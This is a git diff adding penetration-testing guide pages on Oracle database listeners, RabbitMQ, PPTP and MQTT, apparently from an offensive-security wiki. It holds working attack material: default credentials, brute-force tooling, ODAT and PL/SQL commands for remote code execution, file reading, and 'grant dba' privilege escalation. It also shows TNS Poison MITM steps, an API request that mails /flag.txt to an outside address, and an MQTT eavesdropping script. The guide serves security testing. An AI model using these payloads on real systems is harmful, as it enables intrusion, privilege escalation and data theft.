+* **DBSNMP/DBSNMP** — Intelligent Agent uses this to talk to the db server \(its some work to change it\)
+* **SYS/CHANGE\_ON\_INSTALL** — Default sysdba account before and including Oracle v9, as of version 10g this has to be different!
+* **PCMS\_SYS/PCMS\_SYS** — Default x account
+* **WMSYS/WMSYS** — Default x account
+* **OUTLN/OUTLN** — Default x account
+* **SCOTT/TIGER** — Default x account
+
+Other **default passwords** can be found [here ](http://www.petefinnigan.com/default/oracle_default_passwords.htm)and [here](https://cirt.net/passwords?vendor=Oracle).
+
+The versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, and 11.2.0.3 are vulnerable to **offline brute force**. ****[**Read more about this technique here.**](remote-stealth-pass-brute-force.md)\*\*\*\*
+
+### User/Pass bruteforce
+
+Different tools offered **different user/pass lists** for oracle:
+
+* **oscan:** _/usr/share/oscanner/accounts.default_ \(169 lines\)
+* **MSF-1:**  _from_ admin/oracle/oracle\_login  __/usr/share/metasploit-framework/data/wordlists/oracle\_default\_passwords.csv \(598 lines\)
+* **MSF-2:** _from scanner/oracle/oracle\_login_  _/usr/share/metasploit-framework/data/wordlists/oracle\_default\_userpass.txt_ \(568 lines\)
+* **Nmap:** _/usr/share/nmap/nselib/data/oracle-default-accounts.lst_ \(687 lines\)
+
+I have **mixed** all of them, **remove duplicates:**
+
+{% file src="../../.gitbook/assets/users-oracle.txt" %}
+
+{% file src="../../.gitbook/assets/pass-oracle.txt" %}
+
+### [Brute Force](../../brute-force.md#oraclesql)
+
+Now, that you **know a valid SID and valid credentials**. To connect to the database you need the tool: _**sqlplus**_ and to install it you need to follow some steps: 
+
+[Installation](oracle-pentesting-requirements-installation.md)
+
+To login using known credentials:
+
+```text
+sqlplus <username>/<password>@<ip_address>/<SID>;
+```
+
+If the TNS Listener is on a non-default port \(e.g. TCP/1522\) :
+
+```text
+sqlplus <username>/<password>@<ip_address>:<port>/<SID>;
+```
+
+If an **account has system database priviledges \(sysdba\) or system operator \(sysop\)** you may wish to try the following:
+
+```text
+sqlplus <username>/<password>@<ip_address>/<SID> 'as sysdba';
+#Example:
+sqplus SYSTEM/MANAGER@192.168.0.2/ORCL 'as sysdba'
+```
+
+## **All in One**
+
+**An interesting tool is oscanner**, which will try to get some valid SID and then it will brute-force for valid credentials and try to extract some information:
+
+```text
+oscanner -s <IP> -P <PORT>
+```
+
+Another tool that will do all of this it **odat**:
+
+```text
+./odat.py all -s <IP> -p <PORT>
+./odat.py all -s <IP> -p <PORT> -d <SID> #To bruteforce accounts for that SID
+```
+
+With these options \(_-s_ and _-p_\), ODAT will **search valid SID** \(System ID\) in a first step. You can configure some options for configuring methods \(i.e. word-list or brute-force attack\). By default, ODAT will use a big word list and it will do a small brute-force attack.
+
+If ODAT **founds at least one SID** \(e.g. _ORCL_\), it will **search valid Oracle accounts**. It will do that on **each SID found**. You can specify some options for credentials \(e.g. _--accounts-file_, _--accounts-files_, _--login-as-pwd_\).
+
+For **each valid account** \(e.g. _SYS_\) **on each valid instance** \(SID\), ODAT will return **what each Oracle user can do** \(e.g. reverse shell, read files, become DBA\).
+
+[**Wiki odat**](https://github.com/quentinhardy/odat/wiki)\*\*\*\*
+
+## Remote Code Execution
+
+There are at least two different ways to execute commands, such as by using Java procedures and DBMS\_SCHEDULER package. By the way, you can also achieve RCE in case of SQL injection in a web application provided, of course, that the user running it has sufficient rights. At this stage, I highly recommend preparing the Oracle Database Attacking Tool: [ODAT](https://github.com/quentinhardy/odat).
+
+### Install ODAT
+
+```text
+git clone https://github.com/quentinhardy/odat.git
+cd odat
+./odat.py #It should not be problems in Kali
+```
+
+### Execute Code via Java Stored Procedure
+
+```text
+./odat.py java -s <IP> -U <username> -P <password> -d <SID> --exec COMMAND
+```
+
+[More details here](oracle-rce-and-more.md#rce-java-store-procedure)
+
+### Execute code via Scheduler
+
+```text
+./odat.py dbmsscheduler -s <IP> -d <SID> -U <username> -P <password> --exec "C:\windows\system32\cmd.exe /c echo 123&gt;&gt;C:\hacK"
+```
+
+[More details here](oracle-rce-and-more.md#rce-scheduler)
+
+### Execute code via External Tables
+
+```text
+./odat.py externaltable -s <IP> -U <username> -P <password> -d <SID> --exec "C:/windows/system32" "calc.exe"
+```
+
+‘ODAT.py’ requires the privilege ‘CREATE ANY DIRECTORY’, which, by default, is granted only to DBA role, since it attempts to execute the file from any and not only “your” directory \(the manual version of this attack requires less privileges\).
+
+[More details here.](oracle-rce-and-more.md#rce-external-tables)
+
+## Read/Write files
+
+```text
+./odat.py utlfile -s <IP> -d <SID> -U <username> -P <password> --getFile "C:/test" token.txt token.txt
+./odat.py externaltable -s <IP> -U <username> -P <password> -d <SID> --getFile "C:/test" "my4.txt" "my"
+```
+
+[More details here](oracle-rce-and-more.md#read-write-files)
+
+## Elevating Privileges
+
+[More details here](oracle-rce-and-more.md#elevating-privileges)
+
+You can use the [privesc ](https://github.com/quentinhardy/odat/wiki/privesc)module from odat to escalate privileges. In that link you can find **several ways to escalate privileges using odat.**
+
+```
+./odat.py privesc -s $SERVER -d $ID -U $USER -P $PASSWORD -h #Get module Help
+```
+
+Vulnerability tested on oracle 10.1.0.3.0 – should work on thru 10.1.0.5.0 and supposedly on 11g. Fixed with Oracle Critical Patch update October 2007.
+
+```text
+msf> use auxiliary/sqli/oracle/lt_findricset_cursor
+```
+
+## Free Virtual Environment for testing
+
+If you want to practice attacking Oracle databases, the safest way is to register for the Oracle Developer Days Virtualbox VM:
+
+{% embed url="http://www.oracle.com/technetwork/database/enterprise-edition/databaseappdev-vm-161299.html" %}
+
+Most part of the information in this post was extracted from: [https://medium.com/@netscylla/pentesters-guide-to-oracle-hacking-1dcf7068d573](https://medium.com/@netscylla/pentesters-guide-to-oracle-hacking-1dcf7068d573) and from [https://hackmag.com/uncategorized/looking-into-methods-to-penetrate-oracle-db/](https://hackmag.com/uncategorized/looking-into-methods-to-penetrate-oracle-db/)
+
+Other interesting **references**:
+
+[http://blog.opensecurityresearch.com/2012/03/top-10-oracle-steps-to-secure-oracle.html](http://blog.opensecurityresearch.com/2012/03/top-10-oracle-steps-to-secure-oracle.html)
+
+
+
diff --git a/pentesting/1521-1522-1529-pentesting-oracle-listener/oracle-pentesting-requirements-installation.md b/pentesting/1521-1522-1529-pentesting-oracle-listener/oracle-pentesting-requirements-installation.md
new file mode 100644
index 00000000..d0e53cb8
--- /dev/null
+++ b/pentesting/1521-1522-1529-pentesting-oracle-listener/oracle-pentesting-requirements-installation.md
@@ -0,0 +1,72 @@
+# Oracle Pentesting requirements installation
+
+## Installation of tools \(sqlplus\) and needed libraries to use the oracle MSF modules
+
+_\(This installation guide was created for version 12.1.0.1.0, change that name for the version that you download\)_
+
+As root, create the directory `/opt/oracle`. Then download the [Oracle Instant Client](http://www.oracle.com/technetwork/database/features/instant-client/index-097480.html) packages for your version of Kali Linux. The packages you will need are:
+
+* instantclient-basic-linux-12.1.0.1.0.zip
+* instantclient-sqlplus-linux-12.1.0.1.0.zip
+* instantclient-sdk-linux-12.1.0.1.0.zip
+
+Unzip these under `/opt/oracle`, and you should now have a path called `/opt/oracle/instantclient_12_1/`. Next symlink the shared library that we need to access the library from oracle:
+
+```text
+# ln libclntsh.so.12.1 libclntsh.so
+# ls -lh libclntsh.so
+lrwxrwxrwx 1 root root 17 Jun  1 15:41 libclntsh.so -> libclntsh.so.12.1
+# ldconfig
+```
+
+You also need to configure the appropriate environment variables, add the following to either
+
+* ~/.bashrc
+* /etc/profile
+
+```text
+export PATH=$PATH:/opt/oracle/instantclient_12_1
+export SQLPATH=/opt/oracle/instantclient_12_1
+export TNS_ADMIN=/opt/oracle/instantclient_12_1
+export LD_LIBRARY_PATH=/opt/oracle/instantclient_12_1
+export ORACLE_HOME=/opt/oracle/instantclient_12_1
+```
+
+Add Oracle libraries to ldconfig:
+
+```text
+echo "/opt/oracle/instantclient_12_1/" >> /etc/ld.so.conf.d/99_oracle
+```
+
+If you have succeeded, you should be able to run `sqlplus` from a command prompt **\(you may need to log out and log back in again\)**:
+
+```text
+sqlplus <username>/<password>@<ip_address>/<SID>;
+```
+
+### **Step Two — Install Ruby Gem ruby-oci8**
+
+_These steps are needed to use metasploit oracle modules_
+
+**Install other OS dependancies:**
+
+```text
+apt-get install libgmp-dev
+```
+
+**Compile and install ruby-oci8**
+
+```text
+# wget https://github.com/kubo/ruby-oci8/archive/ruby-oci8-2.1.8.zip
+# unzip ruby-oci8-2.1.8.zip
+# cd ruby-oci8-ruby-oci8-2.1.8/
+```
+
+```text
+# make
+# make install
+# gem install ruby-oci8
+```
+
+Restart msfconsole \(or restart the computer\).
+
diff --git a/pentesting/1521-1522-1529-pentesting-oracle-listener/oracle-rce-and-more.md b/pentesting/1521-1522-1529-pentesting-oracle-listener/oracle-rce-and-more.md
new file mode 100644
index 00000000..71c06862
--- /dev/null
+++ b/pentesting/1521-1522-1529-pentesting-oracle-listener/oracle-rce-and-more.md
@@ -0,0 +1,220 @@
+# Oracle RCE & more
+
+## RCE: Java Store Procedure
+
+So, imagine that you have the administrator account information. In this case, a very popular way to execute your command on the server is to write a ‘java stored’ procedure. This is done in three stages. First, create a Java class called ‘oraexec’. To do this, connect via ‘sqlplus’ terminal and write:
+
+```text
+create or replace and resolve java source named "oraexec" as
+import java.lang.*;
+import java.io.*;
+  public class oraexec
+  {
+    public static void execCommand(String command) throws IOException
+    {
+      Runtime.getRuntime().exec(command);
+    }
+  }
+/
+ 
+```
+
+Next, write a PL/SQL wrapper for this class:
+
+```text
+create or replace procedure javacmd(p_command varchar2) as language java name 'oraexec.execCommand(java.lang.String)'; /
+```
+
+That’s it. Now, to execute a command, all you need is just to send the following query:
+
+```text
+exec javacmd('command');
+```
+
+Note that when using the above procedure, we cannot see the results of executed command, however, you can redirect the output to a file and read it. You can find the full code of the shell that allows to read and write files:
+
+{% file src="../../.gitbook/assets/raptor\_oraexec.sql" %}
+
+However, there is a \[more sophisticated script\] \(goo.gl/EuwPRU\) that handles the command output, but it has a larger size [here](https://oracle-base.com/articles/8i/shell-commands-from-plsql).
+
+## RCE: Scheduler
+
+The next method, which will help us if there is no Java virtual machine, is to use ‘dbmsscheduler’, the built-in task scheduler of Oracle. To use it, you must have the privilege ‘CREATE EXTERNAL JOB’. Here’s a code sample that implements the entry of ‘0wned’ string into a text file in the root of the C: drive:
+
+```text
+exec DBMS_SCHEDULER.create_program('RDS2008','EXECUTABLE','c:\ WINDOWS\system32\cmd.exe /c echo 0wned &gt;&gt; c:\rds3.txt',0,TRUE);
+exec DBMS_SCHEDULER.create_job(job_name =&gt; 'RDS2008JOB',program_name =&gt; 'RDS2008',start_date =&gt; NULL,repeat_interval =&gt; NULL,end_date =&gt; NULL,enabled =&gt; TRUE,auto_drop =&gt; TRUE); 
+```
+
+This will create and run a job for executing your command. And here’s an option for calling the Scheduler from another procedure – ‘SYS.KUPP$PROC.CREATE\_MASTER\_PROCESS’, which is of interest to us, primarily, because it allows you to embed multi-statement queries, that is, those consisting of multiple sub-queries. Theoretically, you can run such query even in case of injection into a web application.
+
+```text
+select SYS.KUPP$PROC.CREATE_MASTER_PROCESS('DBMS_SCHEDULER.create_program(''xxx'',''EXECUTABLE'',''cmd.exe /c echo qqq&gt;&gt;C:/scchh'',0,TRUE); DBMS_SCHEDULER.create_job(job_name=&gt;''jobx'',program_name=&gt;''xxx'',start_date=&gt;NULL,repeat_interval=&gt;NULL,end_date=&gt;NULL,enabled=&gt;TRUE,auto_drop=&gt;TRUE);dbms_lock.sleep(1);dbms_scheduler.drop_program(program_name=&gt;''xxx'');dbms_scheduler.purge_log;') from dual
+```
+
+Note that, when you use the Scheduler, you can run this job more than once and do it with some frequency. As a result, this will help you get a foothold in the tested system, because, even if the administrator deletes the user from OS, this job, which is regularly running in the system, will bring him or her back to life.
+
+## RCE: External Tables
+
+As the last method for achieving the execution of OS commands, I would like to mention the use of External Tables. This method will help you later download files from the server. You will need the following privileges:
+
+* UTL\_FILE;
+* CREATE TABLE;
+* a directory reserved for the user.
+
+Let’s remember that the access to ‘UTL\_FILE’ package is by default provided to all accounts with ‘CONNECT’ role. Step one: Check the issued directories with the following query:
+
+```text
+SELECT TABLE_NAME FROM ALL_TAB_PRIVS WHERE TABLE_NAME IN
+(SELECT OBJECT_NAME FROM ALL_OBJECTS WHERE OBJECT_TYPE='DIRECTORY')
+and privilege='EXECUTE' ORDER BY GRANTEE;
+ 
+TABLE_NAME
+------------------------------
+ALICE_DIR
+```
+
+Step two: Create an executable batch file with desired command:
+
+```text
+declare
+ f utl_file.file_type;
+ s varchar2(200) := 'echo KOKOKO &gt;&gt; C:/pwned';
+begin
+ f := utl_file.fopen('ALICE_DIR','test.bat','W');
+ utl_file.put_line(f,s);
+ utl_file.fclose(f);
+end;
+/
+```
+
+Step three: Prepare the external table ‘EXTT’, you will need it to run the file:
+
+```text
+CREATE TABLE EXTT (line varchar2(256))
+ORGANIZATION EXTERNAL
+(TYPE oracle_loader
+  DEFAULT DIRECTORY ALICE_DIR
+  ACCESS PARAMETERS
+  ( RECORDS DELIMITED BY NEWLINE
+    FIELDS TERMINATED BY ',')
+  LOCATION (alice_dir:'test.bat'))
+/
+```
+
+Now, just call your batch file with the following command:
+
+```text
+SELECT * from EXTT;
+```
+
+The terminal will start to display error messages that the system cannot match the table and invoked file but, in this case, it is not important, as the main objective was to open the executable file, which you have achieved.
+
+‘ODAT.py’ utility also can implement this attack. However, it requires the privilege ‘CREATE ANY DIRECTORY’, which, by default, is granted only to DBA role, since it attempts to execute the file from any and not only “your” directory.
+
+## Read/Write files
+
+Now, let’s proceed to the task of reading and writing the files. If you simply need to read or write a file to the server, you can do it without any Java procedures, which, however, can also handle such tasks. Let’s have a look into ‘UTL\_FILE’ package that has the functionality required for working with the file system. The good news is that, by default, it can be accessed by all users with ‘PUBLIC’ role. The bad news is that, by default, this procedure has no access to the entire file system, but only to a directory pre-defined by the administrator. However, it is not uncommon to find a directory parameter specified as ‘\*’, which literally means “access to everything.” You can find this out by using the following command:
+
+```text
+select name, value from v$parameter where name = 'utl_file_dir';
+With appropriate rights, you can expand the access by using the following query:
+alter system set utl_file_dir='*' scope =spfile;
+```
+
+I found that the shortest procedure for using ‘UTL\_FILE’ package is proposed by Alexander Polyakov:
+
+```text
+SET SERVEROUTPUT ON
+declare
+f utl_file.file_type;
+sBuffer Varchar(8000);
+begin
+f:=UTL_FILE.FOPEN (''C:/’,'boot.ini','r');
+loop
+UTL_FILE.GET_LINE (f,sBuffer);
+DBMS_OUTPUT.PUT_LINE(sBuffer);
+end loop;
+EXCEPTION
+when no_data_found then
+UTL_FILE.FCLOSE(f);
+end;
+/
+ 
+```
+
+If you need more functionality with the ability to write, I recommend to google a script called ‘raptor\_oraexec.sql’. And according to tradition, here’s an option for using ‘ODAT’ utility, which, as always, is the shortest:
+
+```text
+./odat.py utlfile -s <IP> -d <SID> -U <username> -P <password> --getFile "C:/test" token.txt token.txt
+```
+
+‘UTL\_FILE’ package is also very interesting because if you’re lucky, you can reach the logs, configuration files and obtain passwords from privileged accounts, such as ‘SYS’.
+
+The second method that I would like to mention is to use again the ‘External Tables’. Remember that, when using ‘External Tables’, the database can access in read mode the data from external tables. For a hacker, this means yet another opportunity to download files from the server, but this method requires ‘CREATE ANY DIRECTORY’ privilege. I suggest immediately using ‘ODAT’, as it is stable and fast:
+
+```text
+./odat.py externaltable -s <IP> -U <username> -P <password> -d <SID> --getFile "C:/test" "my4.txt" "my"
+```
+
+## Elevating Privileges
+
+You can use various methods to elevate privileges, ranging from classic buffer overflows and DLL patching to specialized attacks against databases, such as PL/SQL injections. The topic is very extensive and, in this article, I will not dwell on it, as this is discussed in large research papers, such as those found in the blogs of \[Lichfield\] \(goo.gl/IebQN4\) and \[Finnigan\] \(goo.gl/vXhttf\). I will just demonstrate some of them, so that you have a general idea. During the testing, I recommend simply paying attention to current privileges and, based on this, search for desired loopholes in the Internet.
+
+Unlike MS SQL, where an attacker can inject ‘xp\_cmdshell’ almost immediately after ‘SELECT’ by simply closing it with a quotation mark, Oracle DB flatly rejects such tricks. For this reason, we cannot every time resort to classical SQL injections although, in this case, too, it is possible to find a way out. We will consider PL/SQL injections, which are modifying the process of executing a procedure \(function, trigger, and other objects\) by embedding random commands into available input parameters. \(с\) Sh2kerr
+
+In order to embed the payload, find a function where the input parameters are not filtered. Remember that Oracle SQL does not allow multi-statement \(multiple\) queries, therefore, most likely, you will need to use some “special” procedures that have this feature. The main idea behind the attack is as follows: By default, unless specified otherwise, the procedure is executed on behalf of the owner and not on behalf of the user who started it. In other words, if a procedure owned by ‘SYS’ account is available for execution and you can embed your code into it, your payload will also be executed in the context of ‘SYS’ account. As I already mentioned, this is not what happens always, as there are procedures with ‘authid current\_user’ parameter, which means that this procedure will be executed with privileges of the current user. However, usually in each version, you can find some functions that are vulnerable to PL/ SQL injection. A general view of this process is shown in Fig. 2.
+
+[![inject](https://hackmag.com/wp-content/uploads/2015/04/inject.png)](https://hackmag.com/wp-content/uploads/2015/04/inject.png)
+
+In short, instead of expected legitimate argument, we pass some malicious code that becomes a part of procedure. A good example is provided by ‘CTXSYS.DRILOAD’ function. It is executed on behalf of ‘CTXSYS’ and does not filter the input parameter, which allows you to easily rise up to DBA:
+
+```text
+exec ctxsys.driload.validate_stmt('grant dba to scott');
+```
+
+However, by now, this is probably history, since the vulnerability was found in 2004, and it affects only the old versions 8–9. Usually, the process of escalating the privileges is divided into two parts: writing the procedure that increases the rights and performing the injection itself. A typical procedure is as follows:
+
+```text
+CREATE OR REPLACE FUNCTION F1
+RETURN NUMBER AUTHID CURRENT_USER
+IS
+PRAGMA AUTONOMOUS_TRANSACTION;
+BEGIN
+EXECUTE IMMEDIATE 'GRANT DBA TO TEST';
+COMMIT;RETURN(1);END;
+/
+```
+
+Now we can inject a procedure as an argument of vulnerable function \(example for versions 10x\):
+
+```text
+exec sys.kupw$WORKER.main('x','YY'' and 1=test1.f1 –-');
+```
+
+In the not too recent versions 10 and 11, there is one “nice” exception, or rather a vulnerability, that allows you to execute commands on the server without having DBA rights: ‘DBMS\_JVM\_EXP\_PERMS’ procedure allows a user with ‘CREATE SESSION’ privilege to get ‘JAVA IO’ rights. The attack can be mounted as follows:
+
+```text
+SQL&gt; DECLARE
+   POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
+   CURSOR C1 IS SELECT
+'GRANT','GREMLIN','SYS','java.io.FilePermission','&lt;FILES&gt;&gt;','execute','ENABLED' FROM DUAL;
+  BEGIN
+  OPEN C1;
+  FETCH C1 BULK COLLECT INTO POL;
+  CLOSE C1;
+  DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
+  END;
+  /
+ 
+PL/SQL procedure successfully completed.
+```
+
+Now that you have the privileges to call up Java procedures, you can evoke a response from the Windows interpreter and execute something:
+
+```text
+SQL&gt; select dbms_java.runjava(‘oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c echo 123 &gt;c:\\hack’)from dual;
+```
+
+
+
diff --git a/pentesting/1521-1522-1529-pentesting-oracle-listener/remote-stealth-pass-brute-force.md b/pentesting/1521-1522-1529-pentesting-oracle-listener/remote-stealth-pass-brute-force.md
new file mode 100644
index 00000000..c33b6e3a
--- /dev/null
+++ b/pentesting/1521-1522-1529-pentesting-oracle-listener/remote-stealth-pass-brute-force.md
@@ -0,0 +1,41 @@
+# Remote stealth pass brute force
+
+## Outer Perimeter: Remote stealth pass brute force
+
+**The versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, and 11.2.0.3 are vulnerable** to this technique. In order to understand the idea behind this vulnerability, you need to consider how the authentication protocol works with the database. I will show it for version 11. The interaction with the server proceeds as follows:
+
+1. The client connects to the server and sends the user name.
+2. The server generates a session identifier \(‘AUTH\_SESSKEY’\) and encrypts it by using AES-192. As its key, the system uses SHA-1 hash generated from user password and salt \(‘AUTH\_VFR\_DATA’\).
+3. The server sends an encrypted session ID and salt to the client.
+4. The client generates the key by hashing its password and received salt. The client uses this key to decrypt the session data received from the server.
+5. Based on decrypted server session ID, the client generates a new public key for future use.
+
+Now, here’s the most interesting part: The session ID ‘AUTH\_SESSKEY’ sent by the server to the client has a length of 48 bytes. Of these, 40 bytes are random, and the last 8 are the duplicates of ‘0x08’. The initialization vector is 0x00 \(Null\).  
+Knowing that the last 8 bytes of the public identifier always consist of ‘0x08’, we can bruteforce this password and, moreover, do it in offline mode, which means a tremendous speed, especially if you use GPU. To mount an attack, you need to know SID, valid login \(for example, ‘SYS’ account is very interesting\) and, of course, have the ability to connect to the database. In this case, there will be no records, such as ‘Invalid Login Attempt’, created in the Oracle audit logs!
+
+Summing it all up:
+
+1. Use Wireshark to **intercept** the **initial traffic** during **authorization**. This will be helped by ‘tns’ filter.
+2. Extract **HEX values for AUTH\_SESSKEY, AUTH\_VFR\_DATA**.
+3. Insert them into ****[**PoC script**](https://www.exploit-db.com/exploits/22069), which will perform a dictionary \(brute force\) attack.
+
+### Using nmap and john
+
+```text
+root@kali:~# nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30
+
+Starting Nmap 6.49BETA4 (https://nmap.org) at 2016-03-02 14:58 EST
+Nmap scan report for 10.11.21.30
+PORT     STATE SERVICE
+1521/tcp open  oracle
+| oracle-brute-stealth:
+|   Accounts
+|     SYS:$o5logon$1245C95384E15E7F0C893FCD1893D8E19078170867E892CE86DF90880E09FAD3B4832CBCFDAC1
+|     A821D2EA8E3D2209DB6*4202433F49DE9AE72AE2 - 
+|     Hashed valid or invalid credentials
+|   Statistics
+|_    Performed 241 guesses in 12 seconds, average tps: 20
+
+john hashes.txt
+```
+
diff --git a/pentesting/1521-1522-1529-pentesting-oracle-listener/tns-poison.md b/pentesting/1521-1522-1529-pentesting-oracle-listener/tns-poison.md
new file mode 100644
index 00000000..86bcf2f8
--- /dev/null
+++ b/pentesting/1521-1522-1529-pentesting-oracle-listener/tns-poison.md
@@ -0,0 +1,28 @@
+# TNS Poison
+
+## TNS Poison
+
+If you encounter a newer version of the listener, there is not much room left except brute-forcing. However, all versions up to version 12c are vulnerable to an attack called ‘TNS Poison’. Though the latter version is vulnerable only in some special configurations. For example, one of the ways to fix this vulnerability is by disabling the dynamic configuration of the listener, which is impossible when using Oracle DataGuard, PL/SQL Gateway in connection with APEX and in some versions of SAP. In general, the issue is that, by default, the listener service supports remote configuration and, in addition, it allows to do it anonymously. This is where the heart of vulnerability lies.
+
+[![Fig. 1. TNS Poison Vulnerability](https://hackmag.com/wp-content/uploads/2015/04/poison.png)](https://hackmag.com/wp-content/uploads/2015/04/poison.png)
+
+Fig. 1. TNS Poison Vulnerability
+
+This is a sample attack algorithm \(see Fig. 1\):
+
+* Send the following TNS query: ‘CONNECT\_DATA=\(COMMAND=SERVICE\_REGISTER\_NSGR\)\)’.
+* The vulnerable server will respond: ‘\(DESCRIPTION=\(TMP=\)\)’. This is what will be the answer from a patched server: ‘\(ERROR\_STACK=\(ERROR=1194\)\)’.
+* Generate a configuration package with SID and IP of the new listener \(for future MITM\). The number of characters in the name of the current SID is of fundamental importance. You need to know it, since this is what a Well Formed package depends on.
+* Next, send all these goodies to the listener.
+* If everything is correct, then all new connections will be forwarded by the listener through your controlled IP.
+
+It is important not to forget to enable the proxying of queries \(like IP\_forwarding in Linux\), otherwise, instead of a neat MITM attack, you will get a rough DoS, because the new clients will be unable to connect to the database. As a result, an attacker can embed their own commands within another user’s session. **You can check whether the server is vulnerable by using the following MSF module: ‘auxiliary/scanner/oracle/tnspoison\_checker’.**
+
+All this page was extracted from here: [https://hackmag.com/uncategorized/looking-into-methods-to-penetrate-oracle-db/](https://hackmag.com/uncategorized/looking-into-methods-to-penetrate-oracle-db/)
+
+**Other way to test:**
+
+```text
+./odat.py tnspoison -s <IP> -p <PORT> -d <SID> --test-module
+```
+
diff --git a/pentesting/15672-pentesting-rabbitmq-management.md b/pentesting/15672-pentesting-rabbitmq-management.md
new file mode 100644
index 00000000..c29e6946
--- /dev/null
+++ b/pentesting/15672-pentesting-rabbitmq-management.md
@@ -0,0 +1,44 @@
+# 15672 - Pentesting RabbitMQ Management
+
+## Basic Information
+
+You can learn more about RabbitMQ in [**5671,5672 - Pentesting AMQP**](5671-5672-pentesting-amqp.md).  
+In this port you may find the RabbitMQ Management web console if the [management plugin](https://www.rabbitmq.com/management.html) is enabled.  
+The main page should looks like this:
+
+![](../.gitbook/assets/image%20%288%29.png)
+
+## Enumeration
+
+The default credentials are "_**guest**_":"_**guest**_". If they aren't working you may try to [**brute-force the login**](../brute-force.md#http-post-form).
+
+To manually start this module you need to execute: 
+
+```text
+rabbitmq-plugins enable rabbitmq_management
+service rabbitmq-server restart
+```
+
+Once you have correctly authenticated you will see the admin console:
+
+![](../.gitbook/assets/image%20%2883%29.png)
+
+Also, if you have valid credentials you may find interesting the information of `http://localhost:15672/api/connections`
+
+Note also that it's possible to **publish data inside a queue** using the API of this service with a request like:
+
+```bash
+POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Type: application/json;charset=UTF-8
+Content-Length: 267
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"zevtnax+ppp@gmail.com\", \"attachments\": [{\"path\": \"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}
+```
+
+### Shodan
+
+* `port:15672 http`
+
diff --git a/pentesting/1723-pentesting-pptp.md b/pentesting/1723-pentesting-pptp.md
new file mode 100644
index 00000000..7daa4c6e
--- /dev/null
+++ b/pentesting/1723-pentesting-pptp.md
@@ -0,0 +1,24 @@
+# 1723 - Pentesting PPTP
+
+## Basic Information
+
+
Commonly used to provide remote access to mobile devices, Point-to-Point Tunneling Protocol \(PPTP\) uses TCP port 1723 for key exchange and IP protocol 47 \(GRE\) to encrypt data between peers.
+
+**Default Port**:1723
+
+## Enumeration
+
+```bash
+nmap –Pn -sSV -p1723 <IP>
+```
+
+### [Brute Force](../brute-force.md#pptp)
+
+## Vulnerabilities
+
+{% embed url="https://www.schneier.com/academic/pptp/" %}
+
+{% embed url="https://github.com/moxie0/chapcrack" %}
+
+
+
diff --git a/pentesting/1883-pentesting-mqtt-mosquitto.md b/pentesting/1883-pentesting-mqtt-mosquitto.md
new file mode 100644
index 00000000..a40eccda
--- /dev/null
+++ b/pentesting/1883-pentesting-mqtt-mosquitto.md
@@ -0,0 +1,74 @@
+# 1883 - Pentesting MQTT \(Mosquitto\)
+
+## Basic Information
+
+MQTT stands for MQ Telemetry Transport. It is a publish/subscribe, extremely simple and lightweight messaging protocol, designed for constrained devices and low-bandwidth, high-latency or unreliable networks. The design principles are to minimise network bandwidth and device resource requirements whilst also attempting to ensure reliability and some degree of assurance of delivery. These principles also turn out to make the protocol ideal of the emerging “machine-to-machine” \(M2M\) or “Internet of Things” world of connected devices, and for mobile applications where bandwidth and battery power are at a premium.
+
+**Default port:** 1883
+
+## Pentesting MQTT
+
+**Authentication is totally optional** and even if authentication is being performed, **encryption is not used by default** \(credentials are sent in clear text\). MITM attacks can still be executed to steal passwords.
+
+To connect to a MQTT service you can use: [https://github.com/bapowell/python-mqtt-client-shell](https://github.com/bapowell/python-mqtt-client-shell) and subscribe yourself to all the topics doing:
+
+```text
+> connect (NOTICE that you need to indicate before this the params of the connection, by default 127.0.0.1:1883)
+> subscribe "#" 1
+> subscribe "$SYS/#"
+```
+
+You could also use [https://github.com/akamai-threat-research/mqtt-pwn](https://github.com/akamai-threat-research/mqtt-pwn)
+
+Or you could **run this code to try to connect to a MQTT service without authentication, subscribe to every topic and listen them**:
+
+```python
+#This is a modified version of https://github.com/Warflop/IOT-MQTT-Exploit/blob/master/mqtt.py
+import paho.mqtt.client as mqtt
+import time
+import os
+
+HOST = "127.0.0.1"
+PORT = 1883
+
+def on_connect(client, userdata, flags, rc):
+	client.subscribe('#', qos=1)
+	client.subscribe('$SYS/#')
+
+def on_message(client, userdata, message):
+	print('Topic: %s | QOS: %s  | Message: %s' % (message.topic, message.qos, message.payload))
+
+def main():
+	client = mqtt.Client()
+	client.on_connect = on_connect
+	client.on_message = on_message
+	client.connect(HOST, PORT)
+	client.loop_start()
+	#time.sleep(10)
+	#client.loop_stop()
+
+if __name__ == "__main__":
+	main()
+```
+
+## More information
+
+from here: [https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b](https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b)
+
+### The Publish/Subscribe Pattern <a id="b667"></a>
+
+The publish/subscribe model is composed of:
+
+* **Publisher**: publishes a message to one \(or many\) topic\(s\) in the broker.
+* **Subscriber**: subscribes to one \(or many\) topic\(s\) in the broker and receives all the messages sent from the publisher.
+* **Broker**: routes all the messages from the publishers to the subscribers.
+* **Topic**: consists of one or more levels that are separated by a a forward slash \(e.g., /smartshouse/livingroom/temperature\).
+
+![](https://miro.medium.com/max/60/1*sIxvchdgHSqAGebJjFHBAg.png?q=20)![](https://miro.medium.com/max/1073/1*sIxvchdgHSqAGebJjFHBAg.png)Figure 01: The Publish/Subscribe Model
+
+### Packet Format <a id="f15a"></a>
+
+Every MQTT packet contains a fixed header \(Figure 02\).![](https://miro.medium.com/max/60/1*k6RkAHEk0576geQGUcKSTA.png?q=20)![](https://miro.medium.com/max/838/1*k6RkAHEk0576geQGUcKSTA.png)Figure 02: Fixed Header
+
